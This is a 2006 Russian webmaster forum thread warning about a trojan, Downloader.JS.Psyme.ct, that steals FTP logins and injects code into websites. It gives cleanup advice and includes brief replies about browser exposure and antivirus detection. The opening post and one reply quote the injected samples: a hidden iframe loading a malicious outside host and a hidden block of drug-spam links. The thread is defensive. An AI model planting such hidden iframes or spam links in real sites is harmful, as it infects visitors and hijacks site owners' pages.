Реклама на сайте Advertise with us

Новый вирь Downloader.JS.Psyme.ct

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

ABC Mobile

С нами с 29.08.05
Сообщения: 819
Рейтинг: 485

Ссылка на сообщениеДобавлено: 15/12/06 в 13:40       Ответить с цитатойцитата 

Не знаю, терли по этому поводу или нет, но обратите внимание, очень неприятная штука.

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct
(возможны другия названия), распространяющий себя через веб-сайты.

Схема заражения довольно проста: достаточно зайти на зараженный
сайт и при стандартных настройках безопасности браузера, вирус
автоматически установится на компьютере пользователя.
После этого он начинает отслеживать логины и пароли от FTP,
высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код, например, такой:

<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0
src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->

или

<u style=display:none><a href="http://www.streetsmarts.us/projects/media/hydrocodone/buy-hydrocodone.html">buy hydrocodone</a>
<a href="http://www.streetsmarts.us/projects/media/hydrocodone/m367-hydrocodone.html">m367 hydrocodone</a></u>

Проверьте свои сайты на предмет заражения. Для этого
достаточно проверить исходный код главной страницы на наличие постороннего текста.

В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователей FTP.

Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы, где в качестве причин заражения указываются различные бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров.

!!! Вирус распространяется только способом, описанным здесь, и его появление не связано с проблемами безопасности на сервере.

[i]Возможно, не туда запостил - перенесите плз если требуется.

Traffic. Leads. Conversion. SEO.

0
 

Z

С нами с 15.05.05
Сообщения: 55059
Рейтинг: 7770


Передовик Master-X (16.10.2007) Передовик Master-X (16.12.2010) Передовик Master-X (01.02.2015) Передовик Master-X (16.05.2015) Передовик Master-X (01.06.2015) Ветеран трепа Master-X (16.06.2015)
Ссылка на сообщениеДобавлено: 15/12/06 в 14:16       Ответить с цитатойцитата 

don Rumata писал:


<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0
src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->

или

<u style=display:none><a href="http://www.streetsmarts.us/projects/media/hydrocodone/buy-hydrocodone.html">buy hydrocodone</a>
<a href="http://www.streetsmarts.us/projects/media/hydrocodone/m367-hydrocodone.html">m367 hydrocodone</a></u>


опять ППЦшники балуются icon_smile.gif

andreich дарит вам акцию до 1 000р
КАТАЛОГ ПАРТНЕРОК | Бурж Гембла – тут! | RU Датинг на подписках

0
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 15/12/06 в 14:48       Ответить с цитатойцитата 

Без палева так линки проставляют icon_smile.gif

0
 

ABC Mobile

С нами с 29.08.05
Сообщения: 819
Рейтинг: 485

Ссылка на сообщениеДобавлено: 15/12/06 в 15:39       Ответить с цитатойцитата 

Интересная идея софтины icon_smile.gif Но оч уж мерзкая =/

Traffic. Leads. Conversion. SEO.

0
 



С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375


Передовик Master-X (01.02.2007) Передовик Master-X (16.02.2007) Передовик Master-X (01.04.2007) Передовик Master-X (01.05.2007) Передовик Master-X (01.10.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 15/12/06 в 17:53       Ответить с цитатойцитата 

а какие браузеры пробиваются? что насчет firefox

0
 

ABC Mobile

С нами с 29.08.05
Сообщения: 819
Рейтинг: 485

Ссылка на сообщениеДобавлено: 15/12/06 в 19:26       Ответить с цитатойцитата 



ХЗ, тестить желания не было icon_smile.gif
ИЕ точно пробивается, остальные - не знаю =/

Traffic. Leads. Conversion. SEO.

0
 



С нами с 19.05.04
Сообщения: 358
Рейтинг: 324

Ссылка на сообщениеДобавлено: 16/12/06 в 03:25       Ответить с цитатойцитата 

Это плагин к IE.

Делаем спецсофт для PPC, AntiSpyware и не только :) ICQ 2001-4567-3
Gay Top Traffic

0
 

Куплю С-300

С нами с 03.05.03
Сообщения: 727
Рейтинг: 705

Ссылка на сообщениеДобавлено: 16/12/06 в 09:19       Ответить с цитатойцитата 

специально залез к касперычу на сайт - эта хрень у них есть в базе (да и большинства антивирусов, только по поводу дяди веба не узнал), то есть по идее пробить не должон.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор сайта

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »